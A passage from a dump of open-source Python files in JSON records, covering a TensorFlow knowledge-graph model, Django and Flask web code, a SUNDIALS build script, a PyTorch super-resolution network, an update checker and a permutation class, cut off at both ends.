(s)')\nax2.set_ylabel('Memory (MB)')\nax2.yaxis.set_label_position('right')\nh1, l1 = ax1.get_legend_handles_labels()\nh2, l2 = ax2.get_legend_handles_labels()\nplt.legend(h1+h2, l1+l2, loc='upper right')\n#plt.show()\nplt.savefig('stflimit.pdf')\n","repo_name":"webmasterar/multi-edsm","sub_path":"experiments/stf-limit/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8000378041","text":"#! usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Author:Kaiyin Zhou\n\"\"\"\n\nimport tensorflow as tf\n\nimport numpy as np\n\n\n\nclass TuckER(tf.keras.Model):\n # loader.data\n def __init__(self, loader,\n ent_vec_dim=200,\n rel_vec_dim=30,\n input_dropout=0.2,\n hidden_dropout1=0.1,\n hidden_dropout2=0.2,\n **kwargs):\n super(TuckER, self).__init__(**kwargs)\n self.rel_vec_dim = rel_vec_dim\n self.ent_vec_dim = ent_vec_dim\n self.E = tf.keras.layers.Embedding(len(loader.entities),\n ent_vec_dim)\n self.R = tf.keras.layers.Embedding(len(loader.relations),\n rel_vec_dim)\n\n self.input_dropout = tf.keras.layers.Dropout(input_dropout)\n self.hidden_dropout1 = tf.keras.layers.Dropout(hidden_dropout1)\n self.hidden_dropout2 = tf.keras.layers.Dropout(hidden_dropout2)\n\n self.bn0 = tf.keras.layers.BatchNormalization()\n self.bn1 = tf.keras.layers.BatchNormalization()\n\n self.W = tf.Variable(\n initial_value=tf.constant(\n np.random.uniform(-1, 1, (self.rel_vec_dim, self.ent_vec_dim, self.ent_vec_dim)\n ), tf.float32),\n trainable=True,\n )\n\n def call(self, e1_idx, r_idx, training=True):\n e1 = self.E(e1_idx)\n x = self.bn0(e1, training=training)\n x = self.input_dropout(x, training=training)\n x = tf.reshape(x, [-1, 1, e1.shape[1]])\n\n r = self.R(r_idx)\n W_mat = tf.matmul(r, tf.reshape(self.W, shape=[r.shape[1], -1]))\n W_mat = tf.reshape(W_mat, shape=[-1, e1.shape[1], e1.shape[1]])\n W_mat = self.hidden_dropout1(W_mat, training=training)\n x = tf.matmul(x, W_mat)\n x = tf.reshape(x, shape=[-1, e1.shape[1]])\n x = self.bn1(x, training=training)\n x = self.hidden_dropout2(x, training=training)\n x = tf.matmul(x, tf.transpose(tf.constant(self.E.get_weights()[0]), [1, 0]))\n pred = tf.math.sigmoid(x)\n return pred\n\n def predict(self, e1_idx, r_idx):\n pre = self(e1_idx, r_idx, training=False)\n return pre\n\n def get_config(self):\n config = {\n 'ent_vec_dim': self.ent_vec_dim,\n \"rel_vec_dim\": self.rel_vec_dim,\n 'input_dropout': self.input_dropout,\n \"hidden_dropout1\": self.hidden_dropout1,\n \"hidden_dropout2\": self.hidden_dropout2,\n }\n base_config = super(TuckER, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def compute_output_shape(self, input_shape):\n return input_shape\n","repo_name":"kyzhouhzau/NLPGNN","sub_path":"nlpgnn/models/tucker.py","file_name":"tucker.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"27"} +{"seq_id":"31348951179","text":"from django.shortcuts import redirect, render\nfrom django.views.generic import ListView, TemplateView\nfrom rest_framework import viewsets\n\nfrom .models import Snowboard\nfrom .process_snowboards import process_queryset, process_size_range\nfrom .serializers import SnowboardSerializer\n\n\nclass SnowboardView(viewsets.ModelViewSet):\n queryset = Snowboard.objects.all()\n serializer_class = SnowboardSerializer\n\n\nclass RiderInfoView(TemplateView):\n template_name = 'snow_form.html'\n\n def get(self, request, *arg, **kwargs):\n return render(request, self.template_name, {'name': 'Rider!'})\n\n def post(self, request, *args, **kwargs):\n global gender\n if request.method == \"POST\":\n gender = request.POST.get('gender')\n style = request.POST.get('style')\n rider_name = request.POST.get('rider_name'),\n skills = request.POST.get('skills'),\n height = request.POST.get('height')\n return redirect(\n f'/your-next-snowboard/'\n f'?rider_name={rider_name}'\n f'&gender={gender}'\n f'&skills={skills}'\n f'&style={style}'\n f'&height={height}'\n )\n\n\nclass YourNextSnowboardView(ListView):\n template_name = 'snowboard_list.html'\n serializer_class = SnowboardSerializer\n queryset = Snowboard.objects.all()\n\n def get(self, request, *arg, **kwargs):\n gender = request.GET.get('gender')\n skills = request.GET.get('skills')\n style = request.GET.get('style')\n height = request.GET.get('height')\n rider_name = request.GET.get('rider_name').split(\"'\")[1].split(\"'\")[0]\n filter = process_queryset(gender, skills, style)\n size_range = None\n if height:\n size_range = process_size_range(int(height), style)\n queryset = Snowboard.objects.filter(\n gender__in=[filter['gender'], 'Unisex'],\n style=filter['style'],\n level=filter['level'],\n )\n return render(request,\n self.template_name,\n {'gender': gender, 'snowboards': queryset, 'rider_name': rider_name, 'size_range': size_range})\n\n","repo_name":"AndraPopa/Django-Snowboard-API","sub_path":"snowboardsapi/snowboards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20375889819","text":"\nimport io\nimport os\nfrom os.path import join\nfrom distutils.log import info\nimport sys\n\nfrom numpy.distutils.command.build_ext import build_ext as _build_ext\nfrom numpy.distutils.system_info import get_info\nfrom numpy.distutils.extension import Extension\n\nPKGCONFIG_CVODE = 'sundials-cvode-serial'\nPKGCONFIG_IDA = 'sundials-ida-serial'\nPKGCONFIG_CVODES = 'sundials-cvodes-serial'\nPKGCONFIG_IDAS = 'sundials-idas-serial'\n\n\ndef write_pxi(filename, definitions):\n \"\"\"\n Write a cython include file (.pxi), `filename`, with the definitions in the\n `definitions` mapping.\n \"\"\"\n with io.open(filename, mode='w', encoding='utf-8') as pxi_file:\n for name, val in definitions.items():\n pxi_file.write(u\"DEF {name} = {val}\\n\".format(name=name, val=val))\n return filename\n\n\ndef check_macro_def(cmd, symbol, headers=None, include_dirs=None):\n \"\"\"\n Based on numpy.distutils.command.config:config.check_macro_true, checks if\n macro is defined or not\n \"\"\"\n cmd._check_compiler()\n body = \"\"\"\nint main(void)\n{\n#ifdef %s\n#else\n#error undefined macro\n#endif\n ;\n return 0;\n}\"\"\" % (symbol,)\n\n return cmd.try_compile(body, headers, include_dirs)\n\n\ndef get_sundials_config_pxi(include_dirs, dist):\n \"\"\"\n Create pxi file containing some of sundials build config\n\n Don't ask why this is a function, something crazy about\n distutils/numpy not setting _setup_distribution at the right time or\n something...\n \"\"\"\n SUNDIALS_CONFIG_H = \"sundials/sundials_config.h\"\n BASE_PATH = join('scikits', 'odes', 'sundials')\n\n config_cmd = dist.get_command_obj(\"config\")\n\n # Get float type\n if config_cmd.check_macro_true(\n \"SUNDIALS_DOUBLE_PRECISION\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_FLOAT_TYPE = '\"double\"'\n info(\"Found sundials built with double precision.\")\n elif config_cmd.check_macro_true(\n \"SUNDIALS_SINGLE_PRECISION\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_FLOAT_TYPE = '\"single\"'\n info(\"Found sundials built with single precision.\")\n elif config_cmd.check_macro_true(\n \"SUNDIALS_EXTENDED_PRECISION\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_FLOAT_TYPE = '\"extended\"'\n info(\"Found sundials built with extended precision.\")\n else:\n # fall back to double\n SUNDIALS_FLOAT_TYPE = '\"double\"'\n info(\"Failed to find sundials precision, falling back to double...\")\n\n # Get index (int) type\n if config_cmd.check_macro_true(\n \"SUNDIALS_INT32_T\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_INDEX_SIZE = '\"int32\"'\n info(\"Found sundials built with int32.\")\n elif config_cmd.check_macro_true(\n \"SUNDIALS_INT64_T\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n SUNDIALS_INDEX_SIZE = '\"64\"'\n info(\"Found sundials built with int64.\")\n else:\n # fall back to int64\n SUNDIALS_INDEX_SIZE = '\"64\"'\n info(\"Failed to find sundials index type, falling back to int64...\")\n\n # Check for blas/lapack\n if check_macro_def(\n config_cmd,\n \"SUNDIALS_BLAS_LAPACK\", headers=[SUNDIALS_CONFIG_H],\n include_dirs=include_dirs\n ):\n has_lapack = True\n else:\n has_lapack = False\n\n cfg = dict(\n float_type = SUNDIALS_FLOAT_TYPE,\n index_size = SUNDIALS_INDEX_SIZE,\n has_lapack = has_lapack,\n )\n\n return write_pxi(join(BASE_PATH, \"sundials_config.pxi\"), dict(\n SUNDIALS_FLOAT_TYPE=SUNDIALS_FLOAT_TYPE,\n SUNDIALS_INDEX_SIZE=SUNDIALS_INDEX_SIZE,\n SUNDIALS_BLAS_LAPACK=str(has_lapack),\n )), cfg\n\n\nclass build_ext(_build_ext):\n \"\"\"\n Custom distutils command which encapsulates api_gen pre-building,\n Cython building, and C compilation.\n \"\"\"\n def _get_cython_ext(self):\n base_path = join('scikits', 'odes', 'sundials')\n base_module = \"scikits.odes.sundials\"\n\n SUNDIALS_LIBRARIES = []\n CVODE_LIBRARIES = []\n IDA_LIBRARIES = []\n CVODES_LIBRARIES = []\n IDAS_LIBRARIES = []\n\n SUNDIALS_LIBRARY_DIRS = []\n CVODE_LIBRARY_DIRS = []\n IDA_LIBRARY_DIRS = []\n CVODES_LIBRARY_DIRS = []\n IDAS_LIBRARY_DIRS = []\n\n SUNDIALS_INCLUDE_DIRS = []\n CVODE_INCLUDE_DIRS = []\n IDA_INCLUDE_DIRS = []\n CVODES_INCLUDE_DIRS = []\n IDAS_INCLUDE_DIRS = []\n\n SUNDIALS_LIBDIR = os.environ.get(\"SUNDIALS_LIBDIR\")\n SUNDIALS_INCLUDEDIR = os.environ.get(\"SUNDIALS_INCLUDEDIR\")\n SUNDIALS_INST_PREFIX = os.environ.get(\"SUNDIALS_INST\")\n\n if SUNDIALS_LIBDIR or SUNDIALS_INCLUDEDIR:\n SUNDIALS_INCLUDE_DIRS.extend(\n [SUNDIALS_INCLUDEDIR] if SUNDIALS_INCLUDEDIR is not None else []\n )\n SUNDIALS_LIBRARY_DIRS.extend(\n [SUNDIALS_LIBDIR] if SUNDIALS_LIBDIR is not None else []\n )\n\n elif SUNDIALS_INST_PREFIX is not None:\n SUNDIALS_LIBRARY_DIRS.append(os.path.join(SUNDIALS_INST_PREFIX, \"lib\"))\n SUNDIALS_INCLUDE_DIRS.append(os.path.join(SUNDIALS_INST_PREFIX, \"include\"))\n info(\"SUNDIALS installation path set to `{}` via $SUNDIALS_INST.\".format(\n SUNDIALS_INST_PREFIX))\n else:\n info(\"Searching for SUNDIALS path...\")\n\n # use pkgconfig to find sundials\n try:\n import pkgconfig\n from pkgconfig.pkgconfig import PackageNotFoundError\n try:\n cvode_pkgconf = pkgconfig.parse(PKGCONFIG_CVODE)\n for d in cvode_pkgconf.get('library_dirs', []):\n CVODE_LIBRARY_DIRS.append(str(d))\n for d in cvode_pkgconf.get('include_dirs', []):\n CVODE_INCLUDE_DIRS.append(str(d))\n for lib in cvode_pkgconf.get('include_dirs', []):\n CVODE_LIBRARIES.append(str(lib))\n\n ida_pkgconf = pkgconfig.parse(PKGCONFIG_IDA)\n for d in ida_pkgconf.get('library_dirs', []):\n IDA_LIBRARY_DIRS.append(str(d))\n for d in ida_pkgconf.get('include_dirs', []):\n IDA_INCLUDE_DIRS.append(str(d))\n for lib in ida_pkgconf.get('include_dirs', []):\n IDA_LIBRARIES.append(str(lib))\n\n\n cvodes_pkgconf = pkgconfig.parse(PKGCONFIG_CVODES)\n for d in cvodes_pkgconf.get('library_dirs', []):\n CVODES_LIBRARY_DIRS.append(str(d))\n for d in cvodes_pkgconf.get('include_dirs', []):\n CVODES_INCLUDE_DIRS.append(str(d))\n for lib in cvodes_pkgconf.get('include_dirs', []):\n CVODES_LIBRARIES.append(str(lib))\n\n idas_pkgconf = pkgconfig.parse(PKGCONFIG_IDAS)\n for d in idas_pkgconf.get('library_dirs', []):\n IDAS_LIBRARY_DIRS.append(str(d))\n for d in idas_pkgconf.get('include_dirs', []):\n IDAS_INCLUDE_DIRS.append(str(d))\n for lib in idas_pkgconf.get('include_dirs', []):\n IDAS_LIBRARIES.append(str(lib))\n except (EnvironmentError, PackageNotFoundError) as e:\n pass\n except ImportError:\n info(\"pkgconfig module not found, using preset paths\")\n\n sundials_pxi, cfg = get_sundials_config_pxi(SUNDIALS_INCLUDE_DIRS,\n self.distribution)\n\n has_lapack = cfg['has_lapack']\n\n if not SUNDIALS_LIBRARIES:\n # This is where to put N_vector codes (currently only serial is\n # supported)\n SUNDIALS_LIBRARIES.append('sundials_nvecserial')\n # SUNDIALS_LIBRARIES.append('sundials_nvecopenmp')\n # SUNDIALS_LIBRARIES.append('sundials_nvecparallel')\n # SUNDIALS_LIBRARIES.append('sundials_nvecparhyp')\n # SUNDIALS_LIBRARIES.append('sundials_nvecpetsc')\n # SUNDIALS_LIBRARIES.append('sundials_nvecpthreads')\n\n # This is where to put SUNLinearSolver codes (klu not supported\n # yet)\n if has_lapack:\n SUNDIALS_LIBRARIES.append('sundials_sunlinsollapackband')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsollapackdense')\n\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolband')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsoldense')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolpcg')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolspbcgs')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolspfgmr')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolspgmr')\n SUNDIALS_LIBRARIES.append('sundials_sunlinsolsptfqmr')\n # SUNDIALS_LIBRARIES.append('sundials_sunlinsolklu')\n\n # This is where to put SUNMatrix codes\n SUNDIALS_LIBRARIES.append('sundials_sunmatrixband')\n SUNDIALS_LIBRARIES.append('sundials_sunmatrixdense')\n SUNDIALS_LIBRARIES.append('sundials_sunmatrixsparse')\n\n if not IDA_LIBRARIES:\n IDA_LIBRARIES.append('sundials_ida')\n\n if not CVODE_LIBRARIES:\n CVODE_LIBRARIES.append('sundials_cvode')\n\n if not IDAS_LIBRARIES:\n IDAS_LIBRARIES.append('sundials_idas')\n\n if not CVODES_LIBRARIES:\n CVODES_LIBRARIES.append('sundials_cvodes')\n\n if has_lapack:\n lapack_opt = get_info('lapack_opt', notfound_action=2)\n\n if lapack_opt:\n SUNDIALS_INCLUDE_DIRS.extend(lapack_opt.get('include_dirs',[]))\n SUNDIALS_LIBRARY_DIRS.extend(lapack_opt.get('library_dirs',[]))\n SUNDIALS_LIBRARIES.extend(lapack_opt.get('libraries',[]))\n info('Found LAPACK paths via lapack_opt ...')\n else:\n info('LAPACK was not found, but SUNDIALS compiled against '\n 'lapack, check your numpy installation'\n )\n\n CVODE_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n IDA_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n CVODES_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n IDAS_LIBRARIES.extend(SUNDIALS_LIBRARIES)\n CVODE_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n IDA_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n CVODES_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n IDAS_INCLUDE_DIRS.extend(SUNDIALS_INCLUDE_DIRS)\n CVODE_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n IDA_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n CVODES_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n IDAS_LIBRARY_DIRS.extend(SUNDIALS_LIBRARY_DIRS)\n\n return [\n Extension(\n base_module + '.' + \"common_defs\",\n sources = [join(base_path, 'common_defs.pyx')],\n include_dirs=SUNDIALS_INCLUDE_DIRS,\n library_dirs=SUNDIALS_LIBRARY_DIRS,\n libraries=SUNDIALS_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"cvode\",\n sources = [join(base_path, 'cvode.pyx')],\n include_dirs=CVODE_INCLUDE_DIRS,\n library_dirs=CVODE_LIBRARY_DIRS,\n libraries=CVODE_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"ida\",\n sources = [join(base_path, 'ida.pyx')],\n include_dirs=IDA_INCLUDE_DIRS,\n library_dirs=IDA_LIBRARY_DIRS,\n libraries=IDA_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"cvodes\",\n sources = [join(base_path, 'cvodes.pyx')],\n include_dirs=CVODES_INCLUDE_DIRS,\n library_dirs=CVODES_LIBRARY_DIRS,\n libraries=CVODES_LIBRARIES,\n ),\n Extension(\n base_module + '.' + \"idas\",\n sources = [join(base_path, 'idas.pyx')],\n include_dirs=IDAS_INCLUDE_DIRS,\n library_dirs=IDAS_LIBRARY_DIRS,\n libraries=IDAS_LIBRARIES,\n ),\n ]\n\n\n def run(self):\n \"\"\" Distutils calls this method to run the command \"\"\"\n from Cython.Build import cythonize\n self.extensions.extend(cythonize(\n self._get_cython_ext(), \n compiler_directives= {'language_level' : sys.version_info[0]})\n )\n _build_ext.run(self) # actually do the build\n\n","repo_name":"bmcage/odes","sub_path":"setup_build.py","file_name":"setup_build.py","file_ext":"py","file_size_in_byte":12718,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"27"} +{"seq_id":"41263390037","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Console script for oz_cli.\"\"\"\nimport sys\nimport os\nimport logging\nimport click\nimport networkx as nx\n\nfrom .env import env\nfrom .config import config\nfrom .graph import build_dependency_graph\n\nconfig.register('logging_config_path',\n env_key='LOG_CFG',\n default='logging.yaml')\nlog = logging.getLogger()\n\ndef setup_logging():\n path = config['logging_config_path']\n if os.path.exists(path):\n with open(path, 'rt') as f:\n logging_config = yaml.safe_load(f.read())\n logging.config.dictConfig(logging_config)\n else:\n logging.basicConfig(level=logging.INFO)\n\ndef evaluate(dag):\n for node in nx.topological_sort(dag):\n name = dag.nodes[node]['spell']['name']\n contents = dag.nodes[node]['spell']['contents']\n log.info(\"{} -> {}: {}\".format(node, name, contents))\n\n@click.command()\n@click.argument('command', nargs=1)\n@click.argument('context', nargs=-1)\ndef main(command, context):\n \"\"\"Console script for oz.\"\"\"\n setup_logging()\n\n with env['search_index'].searcher() as searcher:\n dag = build_dependency_graph(command, context, searcher)\n evaluate(dag)\n\nif __name__ == \"__main__\":\n sys.exit(main()) # pragma: no cover\n","repo_name":"shaneleonard/oz","sub_path":"oz/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5982512199","text":"import logging\nimport json\n\nfrom decimal import Decimal\nfrom datetime import datetime\nfrom flask import make_response, redirect\n\nTIME_ZERO = datetime.utcfromtimestamp(0)\n\n\ndef pack_custom_response(data_list):\n '''\n Pack proper responsed data in json for APIs\n '''\n response_data = {}\n items = []\n items_dict = {}\n shops = []\n shops_dict = {}\n\n for data in data_list:\n if data.get('title') and data.get('id'):\n if data.get('id') not in shops_dict:\n shops_dict[data.get('id')] = data\n shops.append(data)\n\n if data.get('name') and data.get('id'):\n if data.get('id') not in items_dict:\n items_dict[data.get('id')] = data\n items.append(data)\n\n if items:\n response_data['items'] = items\n\n if shops:\n response_data['shopping_list'] = shops\n\n return response_data\n\n\ndef json_serializer(obj):\n if isinstance(obj, Decimal):\n return float(obj)\n\n if isinstance(obj, datetime):\n return int((obj - TIME_ZERO).total_seconds() * 1000)\n\n if hasattr(obj, 'to_json'):\n return obj.to_json()\n\n raise TypeError\n\n\ndef normalize(obj):\n return json.loads(json.dumps(obj, default=json_serializer))\n\n\ndef render_error(error, description):\n error_code = {\n 'invalid_request': 400,\n 'invalid_items': 404,\n 'data_does_not_exist': 404,\n 'unknown_method': 405,\n 'too_many_requests': 429,\n 'internal_server_error': 500,\n 'unimplemented': 500,\n }\n\n response = make_response(json.dumps({'status': error_code.get(error), 'reason': description}))\n response.status_code = error_code.get(error)\n response.headers[\"Content-Type\"] = \"application/json\"\n\n logging.error('error status: %s reason: %s', error_code.get(error), description)\n\n return response\n\n\ndef render_response(code, resp_data):\n response = None\n\n if not isinstance(resp_data, str):\n response = make_response(json.dumps(\n {'status': code, 'data': resp_data}, default=json_serializer))\n else:\n response = make_response(json.dumps({'status': code, 'data': resp_data}))\n\n response.headers[\"Content-Type\"] = \"application/json\"\n\n return response\n","repo_name":"gcoolmaneric/api-server","sub_path":"apiserver/utils/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19838774742","text":"from django.contrib import admin\nfrom .models import Destination, Review\n\nclass DestinationAdmin(admin.ModelAdmin):\n list_display = ('title', 'category', 'budget')\n list_filter = ('category', 'budget')\n search_fields = ('title',)\n\nadmin.site.register(Destination, DestinationAdmin)\nadmin.site.register(Review)\n","repo_name":"veridetta/web","sub_path":"myapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11601204069","text":"import re\n\npattern = r\"((w{3})\\.[A-Za-z0-9]+(\\-[A-Za-z0-9]+)*(\\.[a-z]+)+)\"\nvalid_emails = []\nsentence = input()\nwhile True:\n if sentence == \"\":\n break\n else:\n valid_emails += [e_mail.group() for e_mail in re.finditer(pattern, sentence)]\n sentence = input()\nprint(\"\\n\".join(valid_emails))","repo_name":"petrova91/SoftUni---Courses","sub_path":"programming_fundamentals_2022/ex_regular_expressions/extract the_links.py","file_name":"extract the_links.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26157974881","text":"from django.db import models\n\nfrom bases.models import ClaseModelo\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nfrom datetime import date\n\n#################################################################################\nclass Tipo_actividad( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del tipo de actividad',\n unique=True,\n verbose_name='Descripción tipo actividad'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Tipo_actividad, self ).save()\n\n class Meta:\n verbose_name = 'Tipo de actividad'\n verbose_name_plural = 'Tipos de actividades'\n\n\n#################################################################################\n\nclass Actividad_interna(ClaseModelo):\n\n tipo_actividad = models.ForeignKey(Tipo_actividad, on_delete=models.PROTECT)\n \n nombre = models.CharField(\n max_length=255,\n help_text='Nombre de la actividad',\n verbose_name='Nombre actividad'\n )\n\n descripcion = models.TextField(\n help_text='Descripción de la actividad',\n verbose_name='Descripción de la actividad'\n )\n\n fecha_actividad = models.DateTimeField(\n )\n\n lugar_actividad = models.CharField(max_length=255)\n\n solo_miembros = models.BooleanField(default=False\n )\n\n\n def save(self):\n self.nombre = self.nombre.upper()\n self.descripcion = self.descripcion.capitalize()\n self.lugar_actividad = self.lugar_actividad.upper()\n super( Actividad_interna, self ).save()\n \n def __str__(self):\n return '{}'.format( self.nombre)\n\n class Meta:\n verbose_name = 'Actividad interna'\n verbose_name_plural = 'Actividades internas'\n","repo_name":"davalerova/ieee-etitc","sub_path":"actividad_interna/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42628632284","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass SRNet(nn.Module):\n def __init__(self, in_channels, n_features):\n super(SRNet, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels, n_features, [2, 2], stride=1, padding=0, dilation=1)\n self.conv2 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv3 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv4 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv5 = nn.Conv2d(n_features, n_features, 1, stride=1, padding=0, dilation=1)\n self.conv6 = nn.Conv2d(n_features, in_channels, 1, stride=1, padding=0, dilation=1)\n\n # Init weights\n for m in self.modules():\n classname = m.__class__.__name__\n if classname.lower().find('conv') != -1:\n nn.init.kaiming_normal_(m.weight)\n nn.init.constant_(m.bias, 0)\n elif classname.find('bn') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(F.relu(x))\n x = self.conv3(F.relu(x))\n x = self.conv4(F.relu(x))\n x = self.conv5(F.relu(x))\n x = self.conv6(F.relu(x))\n return x","repo_name":"sclzsx/restoration_lut","sub_path":"models/srlut.py","file_name":"srlut.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12767028445","text":"#!/usr/bin/python\n# coding=utf-8\n\n\nimport os\nfrom typing import Tuple, Union\n\nfrom urllib.error import URLError\nfrom urllib.request import Request\nfrom urllib.request import urlopen\n\n\nUPDATE_DURATION = 3600\n\nSCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))\nEC_DIR = os.path.abspath('%s/..' % SCRIPT_DIR)\n\n# User Agent\nUA_CHROME = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0)' \\\n ' AppleWebKit/535.11 (KHTML, like Gecko)' \\\n ' Chrome/17.0.963.56 Safari/535.11'\n\n# VERSION URL\nURL_VERSION = 'https://raw.githubusercontent.com/vancebs/EasyCoding3/master/VERSION'\n\n# VERSION_FILE\nLOCAL_VERSION = '%s/VERSION' % EC_DIR\n\n# Config file\nLAST_CHECK_FILE = '%s/.check' % EC_DIR\nHAS_UPDATE_FILE = '%s/.update' % EC_DIR\n\n\ndef launch():\n # check has update file\n if os.path.exists(HAS_UPDATE_FILE):\n # Printer.green_line('Update already detected')\n return # already found update\n\n # get current time & last check time\n curr_time = int(time.time())\n last_time = get_last_check()[0]\n\n # check whether should do update check\n delta_time = curr_time - last_time\n if delta_time <= UPDATE_DURATION:\n # set_last_check(last_time,\n # 'Unnecessary to update. Next update window after %ss' % (UPDATE_DURATION - delta_time))\n return # unnecessary to update\n\n # update last check time\n set_last_check(curr_time, 'Checking version...')\n\n # get local version\n local_version = get_last_version()\n\n # get remote version\n remote_version = http_get(URL_VERSION).strip()\n if remote_version is None:\n set_last_check(last_time, 'Get remote version failed! Check again next time.') # failed. save last check time\n return\n\n # check need update\n need_update = remote_version != local_version\n\n # do update if necessary\n if not need_update:\n msg = 'Up to date!! local: [%s], remote: [%s]' % (local_version, remote_version)\n set_last_check(curr_time, msg)\n else:\n msg = 'Need update! local: [%s], remote: [%s]' % (local_version, remote_version)\n set_last_check(curr_time, msg)\n set_has_update(remote_version)\n\n\ndef get_last_version() -> str:\n if os.path.exists(LOCAL_VERSION):\n with open(LOCAL_VERSION, 'r') as file:\n return file.readline().strip()\n else:\n return '0'\n\n\ndef get_last_check() -> Tuple[int, str]:\n if os.path.exists(LAST_CHECK_FILE):\n with open(LAST_CHECK_FILE, 'r') as file:\n return int(file.readline().strip()), file.readline().strip()\n else:\n return 0, ''\n\n\ndef set_last_check(timestamp: int, msg: str):\n with open(LAST_CHECK_FILE, 'w') as file:\n file.write('%s\\n%s\\n' % (timestamp, msg))\n\n\ndef set_has_update(version: str):\n with open(HAS_UPDATE_FILE, 'w') as file:\n file.write('%s\\n' % version)\n\n\ndef http_get(url: str) -> Union[None, str]:\n try:\n request = Request(url=url, headers={'User-Agent': UA_CHROME})\n response = urlopen(request, timeout=5)\n return response.read().decode()\n except URLError:\n return None\n\n\nif __name__ == \"__main__\":\n import time\n time.sleep(1)\n launch()\n","repo_name":"vancebs/EasyCoding3","sub_path":"script/CheckUpdate.py","file_name":"CheckUpdate.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11684959721","text":"class Permutation:\r\n def __init__(self, a):\r\n if isinstance(a,list):\r\n res = []\r\n for i in range(len(a)):\r\n res.append(a[i]-1)\r\n self.a = res\r\n else:\r\n self.a = a\r\n self.n = len(self.a)\r\n \r\n def copy(self):\r\n return Permutation([i+1 for i in self.a])\r\n \r\n def __mul__(self, other):\r\n assert isinstance(other, Permutation)\r\n assert len(other.a) == len(self.a)\r\n return Permutation([self[other[i]] for i in range(1,self.n+1)])\r\n \r\n def __pow__(self, other):\r\n if other == 1:\r\n return self.copy()\r\n elif other > 0:\r\n t = (self**(other//2))\r\n if other % 2:\r\n return self*(t*t)\r\n else:\r\n return t*t\r\n elif other == -1:\r\n res = [0 for i in range(self.n)]\r\n for i in range(self.n):\r\n res[self.a[i]] = i+1\r\n return Permutation(res)\r\n \r\n def __getitem__(self, index):\r\n return self.a[index-1]+1\r\n \r\n def __repr__(self):\r\n return \" \".join(str(i+1) for i in range(self.n)) + \"\\n\" + \" \".join(str(self.a[i]+1) for i in range(self.n))\r\n \r\n def evnss(self):\r\n res = 0\r\n for j in range(self.n):\r\n for i in range(j-1):\r\n if self.a[i]>self.a[j]:\r\n res += 1\r\n return res%2\r\n\r\np1 = Permutation([3, 4, 8, 7, 2, 1, 5, 6])\r\np2 = Permutation([6, 4, 3, 7, 1, 8, 5, 2])\r\np3 = Permutation([5, 